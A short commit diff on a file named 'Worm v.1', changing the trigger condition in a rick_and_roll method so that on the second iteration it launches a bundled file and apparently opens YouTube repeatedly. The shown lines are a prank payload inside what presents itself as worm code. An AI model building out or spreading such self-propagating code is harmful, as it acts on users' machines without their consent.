Test iteration variable

--- a/Worm v.1
+++ b/Worm v.1
@@ -153,7 +153,7 @@ class Worm:
     
     def rick_and_roll(self):
         try:
-            if self.iteration == None | self.iteration < 2:
+            if self.iteration == 2:
                 os.startfile(self.own_path + RICKLOC)
                 if YOUTUBETOO:
                     for i in range(0, COUNT):
